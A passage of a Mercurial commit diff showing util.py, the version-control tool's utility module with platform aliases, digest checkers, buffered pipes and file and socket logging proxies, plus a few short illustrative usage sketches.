util: add helper to define proxy functions to utils.*
Yuya Nishihara
r37096:b3079fea default
@@ -1,4373 +1,4347 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import codecs
21 21 import collections
22 22 import contextlib
23 23 import errno
24 24 import gc
25 25 import hashlib
26 26 import imp
27 27 import io
28 28 import itertools
29 29 import mmap
30 30 import os
31 31 import platform as pyplatform
32 32 import re as remod
33 33 import shutil
34 34 import signal
35 35 import socket
36 36 import stat
37 37 import string
38 38 import subprocess
39 39 import sys
40 40 import tempfile
41 41 import textwrap
42 42 import time
43 43 import traceback
44 44 import warnings
45 45 import zlib
46 46
47 47 from . import (
48 48 encoding,
49 49 error,
50 50 i18n,
51 51 node as nodemod,
52 52 policy,
53 53 pycompat,
54 54 urllibcompat,
55 55 )
56 56 from .utils import dateutil
57 57
58 58 base85 = policy.importmod(r'base85')
59 59 osutil = policy.importmod(r'osutil')
60 60 parsers = policy.importmod(r'parsers')
61 61
62 62 b85decode = base85.b85decode
63 63 b85encode = base85.b85encode
64 64
65 65 cookielib = pycompat.cookielib
66 66 empty = pycompat.empty
67 67 httplib = pycompat.httplib
68 68 pickle = pycompat.pickle
69 69 queue = pycompat.queue
70 70 socketserver = pycompat.socketserver
71 71 stderr = pycompat.stderr
72 72 stdin = pycompat.stdin
73 73 stdout = pycompat.stdout
74 74 bytesio = pycompat.bytesio
75 75 # TODO deprecate stringio name, as it is a lie on Python 3.
76 76 stringio = bytesio
77 77 xmlrpclib = pycompat.xmlrpclib
78 78
79 79 httpserver = urllibcompat.httpserver
80 80 urlerr = urllibcompat.urlerr
81 81 urlreq = urllibcompat.urlreq
82 82
83 83 # workaround for win32mbcs
84 84 _filenamebytestr = pycompat.bytestr
85 85
86 86 def isatty(fp):
87 87 try:
88 88 return fp.isatty()
89 89 except AttributeError:
90 90 return False
91 91
92 92 # glibc determines buffering on first write to stdout - if we replace a TTY
93 93 # destined stdout with a pipe destined stdout (e.g. pager), we want line
94 94 # buffering
95 95 if isatty(stdout):
96 96 stdout = os.fdopen(stdout.fileno(), r'wb', 1)
97 97
98 98 if pycompat.iswindows:
99 99 from . import windows as platform
100 100 stdout = platform.winstdout(stdout)
101 101 else:
102 102 from . import posix as platform
103 103
104 104 _ = i18n._
105 105
106 106 bindunixsocket = platform.bindunixsocket
107 107 cachestat = platform.cachestat
108 108 checkexec = platform.checkexec
109 109 checklink = platform.checklink
110 110 copymode = platform.copymode
111 111 executablepath = platform.executablepath
112 112 expandglobs = platform.expandglobs
113 113 explainexit = platform.explainexit
114 114 findexe = platform.findexe
115 115 getfsmountpoint = platform.getfsmountpoint
116 116 getfstype = platform.getfstype
117 117 gethgcmd = platform.gethgcmd
118 118 getuser = platform.getuser
119 119 getpid = os.getpid
120 120 groupmembers = platform.groupmembers
121 121 groupname = platform.groupname
122 122 hidewindow = platform.hidewindow
123 123 isexec = platform.isexec
124 124 isowner = platform.isowner
125 125 listdir = osutil.listdir
126 126 localpath = platform.localpath
127 127 lookupreg = platform.lookupreg
128 128 makedir = platform.makedir
129 129 nlinks = platform.nlinks
130 130 normpath = platform.normpath
131 131 normcase = platform.normcase
132 132 normcasespec = platform.normcasespec
133 133 normcasefallback = platform.normcasefallback
134 134 openhardlinks = platform.openhardlinks
135 135 oslink = platform.oslink
136 136 parsepatchoutput = platform.parsepatchoutput
137 137 pconvert = platform.pconvert
138 138 poll = platform.poll
139 139 popen = platform.popen
140 140 posixfile = platform.posixfile
141 141 quotecommand = platform.quotecommand
142 142 readpipe = platform.readpipe
143 143 rename = platform.rename
144 144 removedirs = platform.removedirs
145 145 samedevice = platform.samedevice
146 146 samefile = platform.samefile
147 147 samestat = platform.samestat
148 148 setbinary = platform.setbinary
149 149 setflags = platform.setflags
150 150 setsignalhandler = platform.setsignalhandler
151 151 shellquote = platform.shellquote
152 152 shellsplit = platform.shellsplit
153 153 spawndetached = platform.spawndetached
154 154 split = platform.split
155 155 sshargs = platform.sshargs
156 156 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
157 157 statisexec = platform.statisexec
158 158 statislink = platform.statislink
159 159 testpid = platform.testpid
160 160 umask = platform.umask
161 161 unlink = platform.unlink
162 162 username = platform.username
163 163
164 164 try:
165 165 recvfds = osutil.recvfds
166 166 except AttributeError:
167 167 pass
168 168 try:
169 169 setprocname = osutil.setprocname
170 170 except AttributeError:
171 171 pass
172 172 try:
173 173 unblocksignal = osutil.unblocksignal
174 174 except AttributeError:
175 175 pass
176 176
177 177 # Python compatibility
178 178
179 179 _notset = object()
180 180
181 181 def safehasattr(thing, attr):
182 182 return getattr(thing, attr, _notset) is not _notset
183 183
184 184 def _rapply(f, xs):
185 185 if xs is None:
186 186 # assume None means non-value of optional data
187 187 return xs
188 188 if isinstance(xs, (list, set, tuple)):
189 189 return type(xs)(_rapply(f, x) for x in xs)
190 190 if isinstance(xs, dict):
191 191 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
192 192 return f(xs)
193 193
194 194 def rapply(f, xs):
195 195 """Apply function recursively to every item preserving the data structure
196 196
197 197 >>> def f(x):
198 198 ... return 'f(%s)' % x
199 199 >>> rapply(f, None) is None
200 200 True
201 201 >>> rapply(f, 'a')
202 202 'f(a)'
203 203 >>> rapply(f, {'a'}) == {'f(a)'}
204 204 True
205 205 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
206 206 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
207 207
208 208 >>> xs = [object()]
209 209 >>> rapply(pycompat.identity, xs) is xs
210 210 True
211 211 """
212 212 if f is pycompat.identity:
213 213 # fast path mainly for py2
214 214 return xs
215 215 return _rapply(f, xs)
216 216
217 217 def bitsfrom(container):
218 218 bits = 0
219 219 for bit in container:
220 220 bits |= bit
221 221 return bits
222 222
223 223 # python 2.6 still has deprecation warnings enabled by default. We do not want
224 224 # to display anything to the standard user, so detect if we are running tests
225 225 # and only use python deprecation warnings in this case.
226 226 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
227 227 if _dowarn:
228 228 # explicitly unfilter our warning for python 2.7
229 229 #
230 230 # The option of setting PYTHONWARNINGS in the test runner was investigated.
231 231 # However, the module name set through PYTHONWARNINGS was matched exactly, so
232 232 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
233 233 # makes the whole PYTHONWARNINGS approach useless for our use case.
234 234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
235 235 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
236 236 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
237 237 if _dowarn and pycompat.ispy3:
238 238 # silence warning emitted by passing user string to re.sub()
239 239 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
240 240 r'mercurial')
241 241 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
242 242 DeprecationWarning, r'mercurial')
243 243
244 244 def nouideprecwarn(msg, version, stacklevel=1):
245 245 """Issue an python native deprecation warning
246 246
247 247 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
248 248 """
249 249 if _dowarn:
250 250 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
251 251 " update your code.)") % version
252 252 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
253 253
254 254 DIGESTS = {
255 255 'md5': hashlib.md5,
256 256 'sha1': hashlib.sha1,
257 257 'sha512': hashlib.sha512,
258 258 }
259 259 # List of digest types from strongest to weakest
260 260 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
261 261
262 262 for k in DIGESTS_BY_STRENGTH:
263 263 assert k in DIGESTS
264 264
265 265 class digester(object):
266 266 """helper to compute digests.
267 267
268 268 This helper can be used to compute one or more digests given their name.
269 269
270 270 >>> d = digester([b'md5', b'sha1'])
271 271 >>> d.update(b'foo')
272 272 >>> [k for k in sorted(d)]
273 273 ['md5', 'sha1']
274 274 >>> d[b'md5']
275 275 'acbd18db4cc2f85cedef654fccc4a4d8'
276 276 >>> d[b'sha1']
277 277 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
278 278 >>> digester.preferred([b'md5', b'sha1'])
279 279 'sha1'
280 280 """
281 281
282 282 def __init__(self, digests, s=''):
283 283 self._hashes = {}
284 284 for k in digests:
285 285 if k not in DIGESTS:
286 286 raise Abort(_('unknown digest type: %s') % k)
287 287 self._hashes[k] = DIGESTS[k]()
288 288 if s:
289 289 self.update(s)
290 290
291 291 def update(self, data):
292 292 for h in self._hashes.values():
293 293 h.update(data)
294 294
295 295 def __getitem__(self, key):
296 296 if key not in DIGESTS:
297 297 raise Abort(_('unknown digest type: %s') % key)
298 298 return nodemod.hex(self._hashes[key].digest())
299 299
300 300 def __iter__(self):
301 301 return iter(self._hashes)
302 302
303 303 @staticmethod
304 304 def preferred(supported):
305 305 """returns the strongest digest type in both supported and DIGESTS."""
306 306
307 307 for k in DIGESTS_BY_STRENGTH:
308 308 if k in supported:
309 309 return k
310 310 return None
311 311
312 312 class digestchecker(object):
313 313 """file handle wrapper that additionally checks content against a given
314 314 size and digests.
315 315
316 316 d = digestchecker(fh, size, {'md5': '...'})
317 317
318 318 When multiple digests are given, all of them are validated.
319 319 """
320 320
321 321 def __init__(self, fh, size, digests):
322 322 self._fh = fh
323 323 self._size = size
324 324 self._got = 0
325 325 self._digests = dict(digests)
326 326 self._digester = digester(self._digests.keys())
327 327
328 328 def read(self, length=-1):
329 329 content = self._fh.read(length)
330 330 self._digester.update(content)
331 331 self._got += len(content)
332 332 return content
333 333
334 334 def validate(self):
335 335 if self._size != self._got:
336 336 raise Abort(_('size mismatch: expected %d, got %d') %
337 337 (self._size, self._got))
338 338 for k, v in self._digests.items():
339 339 if v != self._digester[k]:
340 340 # i18n: first parameter is a digest name
341 341 raise Abort(_('%s mismatch: expected %s, got %s') %
342 342 (k, v, self._digester[k]))
343 343
344 344 try:
345 345 buffer = buffer
346 346 except NameError:
347 347 def buffer(sliceable, offset=0, length=None):
348 348 if length is not None:
349 349 return memoryview(sliceable)[offset:offset + length]
350 350 return memoryview(sliceable)[offset:]
351 351
352 352 closefds = pycompat.isposix
353 353
354 354 _chunksize = 4096
355 355
356 356 class bufferedinputpipe(object):
357 357 """a manually buffered input pipe
358 358
359 359 Python will not let us use buffered IO and lazy reading with 'polling' at
360 360 the same time. We cannot probe the buffer state and select will not detect
361 361 that data are ready to read if they are already buffered.
362 362
363 363 This class lets us work around that by implementing its own buffering
364 364 (allowing efficient readline) while offering a way to know if the buffer is
365 365 empty from the output (allowing collaboration of the buffer with polling).
366 366
367 367 This class lives in the 'util' module because it makes use of the 'os'
368 368 module from the python stdlib.
369 369 """
370 370 def __new__(cls, fh):
371 371 # If we receive a fileobjectproxy, we need to use a variation of this
372 372 # class that notifies observers about activity.
373 373 if isinstance(fh, fileobjectproxy):
374 374 cls = observedbufferedinputpipe
375 375
376 376 return super(bufferedinputpipe, cls).__new__(cls)
377 377
378 378 def __init__(self, input):
379 379 self._input = input
380 380 self._buffer = []
381 381 self._eof = False
382 382 self._lenbuf = 0
383 383
384 384 @property
385 385 def hasbuffer(self):
386 386 """True is any data is currently buffered
387 387
388 388 This will be used externally a pre-step for polling IO. If there is
389 389 already data then no polling should be set in place."""
390 390 return bool(self._buffer)
391 391
392 392 @property
393 393 def closed(self):
394 394 return self._input.closed
395 395
396 396 def fileno(self):
397 397 return self._input.fileno()
398 398
399 399 def close(self):
400 400 return self._input.close()
401 401
402 402 def read(self, size):
403 403 while (not self._eof) and (self._lenbuf < size):
404 404 self._fillbuffer()
405 405 return self._frombuffer(size)
406 406
407 407 def readline(self, *args, **kwargs):
408 408 if 1 < len(self._buffer):
409 409 # this should not happen because both read and readline end with a
410 410 # _frombuffer call that collapses it.
411 411 self._buffer = [''.join(self._buffer)]
412 412 self._lenbuf = len(self._buffer[0])
413 413 lfi = -1
414 414 if self._buffer:
415 415 lfi = self._buffer[-1].find('\n')
416 416 while (not self._eof) and lfi < 0:
417 417 self._fillbuffer()
418 418 if self._buffer:
419 419 lfi = self._buffer[-1].find('\n')
420 420 size = lfi + 1
421 421 if lfi < 0: # end of file
422 422 size = self._lenbuf
423 423 elif 1 < len(self._buffer):
424 424 # we need to take previous chunks into account
425 425 size += self._lenbuf - len(self._buffer[-1])
426 426 return self._frombuffer(size)
427 427
428 428 def _frombuffer(self, size):
429 429 """return at most 'size' data from the buffer
430 430
431 431 The data are removed from the buffer."""
432 432 if size == 0 or not self._buffer:
433 433 return ''
434 434 buf = self._buffer[0]
435 435 if 1 < len(self._buffer):
436 436 buf = ''.join(self._buffer)
437 437
438 438 data = buf[:size]
439 439 buf = buf[len(data):]
440 440 if buf:
441 441 self._buffer = [buf]
442 442 self._lenbuf = len(buf)
443 443 else:
444 444 self._buffer = []
445 445 self._lenbuf = 0
446 446 return data
447 447
448 448 def _fillbuffer(self):
449 449 """read data to the buffer"""
450 450 data = os.read(self._input.fileno(), _chunksize)
451 451 if not data:
452 452 self._eof = True
453 453 else:
454 454 self._lenbuf += len(data)
455 455 self._buffer.append(data)
456 456
457 457 return data
458 458
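# A minimal usage sketch of bufferedinputpipe (illustrative only; the pipe,
# the payload and the select import below are assumptions, not part of this
# file): consult ``hasbuffer`` before polling so data that is already
# buffered is not waited on a second time.
def _sketchbufferedinputpipe():
    import select
    rfd, wfd = os.pipe()
    os.write(wfd, b'one\ntwo\n')
    pipe = bufferedinputpipe(os.fdopen(rfd, r'rb'))
    if not pipe.hasbuffer:
        # nothing buffered yet, so polling the fd cannot miss data
        select.select([pipe.fileno()], [], [])
    return pipe.readline() # -> b'one\n'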
459 459 def mmapread(fp):
460 460 try:
461 461 fd = getattr(fp, 'fileno', lambda: fp)()
462 462 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
463 463 except ValueError:
464 464 # Empty files cannot be mmapped, but mmapread should still work. Check
465 465 # if the file is empty, and if so, return an empty buffer.
466 466 if os.fstat(fd).st_size == 0:
467 467 return ''
468 468 raise
469 469
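# A small sketch of mmapread (illustrative only; the path argument is a
# placeholder): map a file read-only and measure it without first copying it
# into a bytes object. Empty files fall back to an empty buffer, as above.
def _sketchmmapread(path):
    with open(path, r'rb') as fp:
        return len(mmapread(fp))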
470 470 def popen2(cmd, env=None, newlines=False):
471 471 # Setting bufsize to -1 lets the system decide the buffer size.
472 472 # The default for bufsize is 0, meaning unbuffered. This leads to
473 473 # poor performance on Mac OS X: http://bugs.python.org/issue4194
474 474 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
475 475 close_fds=closefds,
476 476 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
477 477 universal_newlines=newlines,
478 478 env=env)
479 479 return p.stdin, p.stdout
480 480
481 481 def popen3(cmd, env=None, newlines=False):
482 482 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
483 483 return stdin, stdout, stderr
484 484
485 485 def popen4(cmd, env=None, newlines=False, bufsize=-1):
486 486 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
487 487 close_fds=closefds,
488 488 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
489 489 stderr=subprocess.PIPE,
490 490 universal_newlines=newlines,
491 491 env=env)
492 492 return p.stdin, p.stdout, p.stderr, p
493 493
494 494 class fileobjectproxy(object):
495 495 """A proxy around file objects that tells a watcher when events occur.
496 496
497 497 This type is intended to only be used for testing purposes. Think hard
498 498 before using it in important code.
499 499 """
500 500 __slots__ = (
501 501 r'_orig',
502 502 r'_observer',
503 503 )
504 504
505 505 def __init__(self, fh, observer):
506 506 object.__setattr__(self, r'_orig', fh)
507 507 object.__setattr__(self, r'_observer', observer)
508 508
509 509 def __getattribute__(self, name):
510 510 ours = {
511 511 r'_observer',
512 512
513 513 # IOBase
514 514 r'close',
515 515 # closed is a property
516 516 r'fileno',
517 517 r'flush',
518 518 r'isatty',
519 519 r'readable',
520 520 r'readline',
521 521 r'readlines',
522 522 r'seek',
523 523 r'seekable',
524 524 r'tell',
525 525 r'truncate',
526 526 r'writable',
527 527 r'writelines',
528 528 # RawIOBase
529 529 r'read',
530 530 r'readall',
531 531 r'readinto',
532 532 r'write',
533 533 # BufferedIOBase
534 534 # raw is a property
535 535 r'detach',
536 536 # read defined above
537 537 r'read1',
538 538 # readinto defined above
539 539 # write defined above
540 540 }
541 541
542 542 # We only observe some methods.
543 543 if name in ours:
544 544 return object.__getattribute__(self, name)
545 545
546 546 return getattr(object.__getattribute__(self, r'_orig'), name)
547 547
548 548 def __nonzero__(self):
549 549 return bool(object.__getattribute__(self, r'_orig'))
550 550
551 551 __bool__ = __nonzero__
552 552
553 553 def __delattr__(self, name):
554 554 return delattr(object.__getattribute__(self, r'_orig'), name)
555 555
556 556 def __setattr__(self, name, value):
557 557 return setattr(object.__getattribute__(self, r'_orig'), name, value)
558 558
559 559 def __iter__(self):
560 560 return object.__getattribute__(self, r'_orig').__iter__()
561 561
562 562 def _observedcall(self, name, *args, **kwargs):
563 563 # Call the original object.
564 564 orig = object.__getattribute__(self, r'_orig')
565 565 res = getattr(orig, name)(*args, **kwargs)
566 566
567 567 # Call a method on the observer of the same name with arguments
568 568 # so it can react, log, etc.
569 569 observer = object.__getattribute__(self, r'_observer')
570 570 fn = getattr(observer, name, None)
571 571 if fn:
572 572 fn(res, *args, **kwargs)
573 573
574 574 return res
575 575
576 576 def close(self, *args, **kwargs):
577 577 return object.__getattribute__(self, r'_observedcall')(
578 578 r'close', *args, **kwargs)
579 579
580 580 def fileno(self, *args, **kwargs):
581 581 return object.__getattribute__(self, r'_observedcall')(
582 582 r'fileno', *args, **kwargs)
583 583
584 584 def flush(self, *args, **kwargs):
585 585 return object.__getattribute__(self, r'_observedcall')(
586 586 r'flush', *args, **kwargs)
587 587
588 588 def isatty(self, *args, **kwargs):
589 589 return object.__getattribute__(self, r'_observedcall')(
590 590 r'isatty', *args, **kwargs)
591 591
592 592 def readable(self, *args, **kwargs):
593 593 return object.__getattribute__(self, r'_observedcall')(
594 594 r'readable', *args, **kwargs)
595 595
596 596 def readline(self, *args, **kwargs):
597 597 return object.__getattribute__(self, r'_observedcall')(
598 598 r'readline', *args, **kwargs)
599 599
600 600 def readlines(self, *args, **kwargs):
601 601 return object.__getattribute__(self, r'_observedcall')(
602 602 r'readlines', *args, **kwargs)
603 603
604 604 def seek(self, *args, **kwargs):
605 605 return object.__getattribute__(self, r'_observedcall')(
606 606 r'seek', *args, **kwargs)
607 607
608 608 def seekable(self, *args, **kwargs):
609 609 return object.__getattribute__(self, r'_observedcall')(
610 610 r'seekable', *args, **kwargs)
611 611
612 612 def tell(self, *args, **kwargs):
613 613 return object.__getattribute__(self, r'_observedcall')(
614 614 r'tell', *args, **kwargs)
615 615
616 616 def truncate(self, *args, **kwargs):
617 617 return object.__getattribute__(self, r'_observedcall')(
618 618 r'truncate', *args, **kwargs)
619 619
620 620 def writable(self, *args, **kwargs):
621 621 return object.__getattribute__(self, r'_observedcall')(
622 622 r'writable', *args, **kwargs)
623 623
624 624 def writelines(self, *args, **kwargs):
625 625 return object.__getattribute__(self, r'_observedcall')(
626 626 r'writelines', *args, **kwargs)
627 627
628 628 def read(self, *args, **kwargs):
629 629 return object.__getattribute__(self, r'_observedcall')(
630 630 r'read', *args, **kwargs)
631 631
632 632 def readall(self, *args, **kwargs):
633 633 return object.__getattribute__(self, r'_observedcall')(
634 634 r'readall', *args, **kwargs)
635 635
636 636 def readinto(self, *args, **kwargs):
637 637 return object.__getattribute__(self, r'_observedcall')(
638 638 r'readinto', *args, **kwargs)
639 639
640 640 def write(self, *args, **kwargs):
641 641 return object.__getattribute__(self, r'_observedcall')(
642 642 r'write', *args, **kwargs)
643 643
644 644 def detach(self, *args, **kwargs):
645 645 return object.__getattribute__(self, r'_observedcall')(
646 646 r'detach', *args, **kwargs)
647 647
648 648 def read1(self, *args, **kwargs):
649 649 return object.__getattribute__(self, r'_observedcall')(
650 650 r'read1', *args, **kwargs)
651 651
652 652 class observedbufferedinputpipe(bufferedinputpipe):
653 653 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
654 654
655 655 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
656 656 bypass ``fileobjectproxy``. Because of this, we need to make
657 657 ``bufferedinputpipe`` aware of these operations.
658 658
659 659 This variation of ``bufferedinputpipe`` can notify observers about
660 660 ``os.read()`` events. It also re-publishes other events, such as
661 661 ``read()`` and ``readline()``.
662 662 """
663 663 def _fillbuffer(self):
664 664 res = super(observedbufferedinputpipe, self)._fillbuffer()
665 665
666 666 fn = getattr(self._input._observer, r'osread', None)
667 667 if fn:
668 668 fn(res, _chunksize)
669 669
670 670 return res
671 671
672 672 # We use different observer methods because the operation isn't
673 673 # performed on the actual file object but on us.
674 674 def read(self, size):
675 675 res = super(observedbufferedinputpipe, self).read(size)
676 676
677 677 fn = getattr(self._input._observer, r'bufferedread', None)
678 678 if fn:
679 679 fn(res, size)
680 680
681 681 return res
682 682
683 683 def readline(self, *args, **kwargs):
684 684 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
685 685
686 686 fn = getattr(self._input._observer, r'bufferedreadline', None)
687 687 if fn:
688 688 fn(res)
689 689
690 690 return res
691 691
692 692 PROXIED_SOCKET_METHODS = {
693 693 r'makefile',
694 694 r'recv',
695 695 r'recvfrom',
696 696 r'recvfrom_into',
697 697 r'recv_into',
698 698 r'send',
699 699 r'sendall',
700 700 r'sendto',
701 701 r'setblocking',
702 702 r'settimeout',
703 703 r'gettimeout',
704 704 r'setsockopt',
705 705 }
706 706
707 707 class socketproxy(object):
708 708 """A proxy around a socket that tells a watcher when events occur.
709 709
710 710 This is like ``fileobjectproxy`` except for sockets.
711 711
712 712 This type is intended to only be used for testing purposes. Think hard
713 713 before using it in important code.
714 714 """
715 715 __slots__ = (
716 716 r'_orig',
717 717 r'_observer',
718 718 )
719 719
720 720 def __init__(self, sock, observer):
721 721 object.__setattr__(self, r'_orig', sock)
722 722 object.__setattr__(self, r'_observer', observer)
723 723
724 724 def __getattribute__(self, name):
725 725 if name in PROXIED_SOCKET_METHODS:
726 726 return object.__getattribute__(self, name)
727 727
728 728 return getattr(object.__getattribute__(self, r'_orig'), name)
729 729
730 730 def __delattr__(self, name):
731 731 return delattr(object.__getattribute__(self, r'_orig'), name)
732 732
733 733 def __setattr__(self, name, value):
734 734 return setattr(object.__getattribute__(self, r'_orig'), name, value)
735 735
736 736 def __nonzero__(self):
737 737 return bool(object.__getattribute__(self, r'_orig'))
738 738
739 739 __bool__ = __nonzero__
740 740
741 741 def _observedcall(self, name, *args, **kwargs):
742 742 # Call the original object.
743 743 orig = object.__getattribute__(self, r'_orig')
744 744 res = getattr(orig, name)(*args, **kwargs)
745 745
746 746 # Call a method on the observer of the same name with arguments
747 747 # so it can react, log, etc.
748 748 observer = object.__getattribute__(self, r'_observer')
749 749 fn = getattr(observer, name, None)
750 750 if fn:
751 751 fn(res, *args, **kwargs)
752 752
753 753 return res
754 754
755 755 def makefile(self, *args, **kwargs):
756 756 res = object.__getattribute__(self, r'_observedcall')(
757 757 r'makefile', *args, **kwargs)
758 758
759 759 # The file object may be used for I/O. So we turn it into a
760 760 # proxy using our observer.
761 761 observer = object.__getattribute__(self, r'_observer')
762 762 return makeloggingfileobject(observer.fh, res, observer.name,
763 763 reads=observer.reads,
764 764 writes=observer.writes,
765 765 logdata=observer.logdata,
766 766 logdataapis=observer.logdataapis)
767 767
768 768 def recv(self, *args, **kwargs):
769 769 return object.__getattribute__(self, r'_observedcall')(
770 770 r'recv', *args, **kwargs)
771 771
772 772 def recvfrom(self, *args, **kwargs):
773 773 return object.__getattribute__(self, r'_observedcall')(
774 774 r'recvfrom', *args, **kwargs)
775 775
776 776 def recvfrom_into(self, *args, **kwargs):
777 777 return object.__getattribute__(self, r'_observedcall')(
778 778 r'recvfrom_into', *args, **kwargs)
779 779
780 780 def recv_into(self, *args, **kwargs):
781 781 return object.__getattribute__(self, r'_observedcall')(
782 782 r'recv_into', *args, **kwargs)
783 783
784 784 def send(self, *args, **kwargs):
785 785 return object.__getattribute__(self, r'_observedcall')(
786 786 r'send', *args, **kwargs)
787 787
788 788 def sendall(self, *args, **kwargs):
789 789 return object.__getattribute__(self, r'_observedcall')(
790 790 r'sendall', *args, **kwargs)
791 791
792 792 def sendto(self, *args, **kwargs):
793 793 return object.__getattribute__(self, r'_observedcall')(
794 794 r'sendto', *args, **kwargs)
795 795
796 796 def setblocking(self, *args, **kwargs):
797 797 return object.__getattribute__(self, r'_observedcall')(
798 798 r'setblocking', *args, **kwargs)
799 799
800 800 def settimeout(self, *args, **kwargs):
801 801 return object.__getattribute__(self, r'_observedcall')(
802 802 r'settimeout', *args, **kwargs)
803 803
804 804 def gettimeout(self, *args, **kwargs):
805 805 return object.__getattribute__(self, r'_observedcall')(
806 806 r'gettimeout', *args, **kwargs)
807 807
808 808 def setsockopt(self, *args, **kwargs):
809 809 return object.__getattribute__(self, r'_observedcall')(
810 810 r'setsockopt', *args, **kwargs)
811 811
812 812 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
813 813 DATA_ESCAPE_MAP.update({
814 814 b'\\': b'\\\\',
815 815 b'\r': br'\r',
816 816 b'\n': br'\n',
817 817 })
818 818 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
819 819
820 820 def escapedata(s):
821 821 if isinstance(s, bytearray):
822 822 s = bytes(s)
823 823
824 824 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
825 825
826 826 class baseproxyobserver(object):
827 827 def _writedata(self, data):
828 828 if not self.logdata:
829 829 if self.logdataapis:
830 830 self.fh.write('\n')
831 831 self.fh.flush()
832 832 return
833 833
834 834 # Simple case writes all data on a single line.
835 835 if b'\n' not in data:
836 836 if self.logdataapis:
837 837 self.fh.write(': %s\n' % escapedata(data))
838 838 else:
839 839 self.fh.write('%s> %s\n' % (self.name, escapedata(data)))
840 840 self.fh.flush()
841 841 return
842 842
843 843 # Data with newlines is written to multiple lines.
844 844 if self.logdataapis:
845 845 self.fh.write(':\n')
846 846
847 847 lines = data.splitlines(True)
848 848 for line in lines:
849 849 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
850 850 self.fh.flush()
851 851
852 852 class fileobjectobserver(baseproxyobserver):
853 853 """Logs file object activity."""
854 854 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
855 855 logdataapis=True):
856 856 self.fh = fh
857 857 self.name = name
858 858 self.logdata = logdata
859 859 self.logdataapis = logdataapis
860 860 self.reads = reads
861 861 self.writes = writes
862 862
863 863 def read(self, res, size=-1):
864 864 if not self.reads:
865 865 return
866 866 # Python 3 can return None from reads at EOF instead of empty strings.
867 867 if res is None:
868 868 res = ''
869 869
870 870 if self.logdataapis:
871 871 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
872 872
873 873 self._writedata(res)
874 874
875 875 def readline(self, res, limit=-1):
876 876 if not self.reads:
877 877 return
878 878
879 879 if self.logdataapis:
880 880 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
881 881
882 882 self._writedata(res)
883 883
884 884 def readinto(self, res, dest):
885 885 if not self.reads:
886 886 return
887 887
888 888 if self.logdataapis:
889 889 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
890 890 res))
891 891
892 892 data = dest[0:res] if res is not None else b''
893 893 self._writedata(data)
894 894
895 895 def write(self, res, data):
896 896 if not self.writes:
897 897 return
898 898
899 899 # Python 2 returns None from some write() calls. Python 3 (reasonably)
900 900 # returns the integer bytes written.
901 901 if res is None and data:
902 902 res = len(data)
903 903
904 904 if self.logdataapis:
905 905 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
906 906
907 907 self._writedata(data)
908 908
909 909 def flush(self, res):
910 910 if not self.writes:
911 911 return
912 912
913 913 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
914 914
915 915 # For observedbufferedinputpipe.
916 916 def bufferedread(self, res, size):
917 917 if not self.reads:
918 918 return
919 919
920 920 if self.logdataapis:
921 921 self.fh.write('%s> bufferedread(%d) -> %d' % (
922 922 self.name, size, len(res)))
923 923
924 924 self._writedata(res)
925 925
926 926 def bufferedreadline(self, res):
927 927 if not self.reads:
928 928 return
929 929
930 930 if self.logdataapis:
931 931 self.fh.write('%s> bufferedreadline() -> %d' % (
932 932 self.name, len(res)))
933 933
934 934 self._writedata(res)
935 935
936 936 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
937 937 logdata=False, logdataapis=True):
938 938 """Turn a file object into a logging file object."""
939 939
940 940 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
941 941 logdata=logdata, logdataapis=logdataapis)
942 942 return fileobjectproxy(fh, observer)
943 943
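# A minimal sketch of makeloggingfileobject (illustrative only; the b'example'
# label and the use of stderr as the log destination are arbitrary choices):
# every read/write on the returned proxy is narrated to the log handle.
def _sketchloggingfileobject(fh):
    proxy = makeloggingfileobject(stderr, fh, b'example', logdata=True)
    proxy.write(b'hello') # log handle sees "example> write(5) -> 5: hello"
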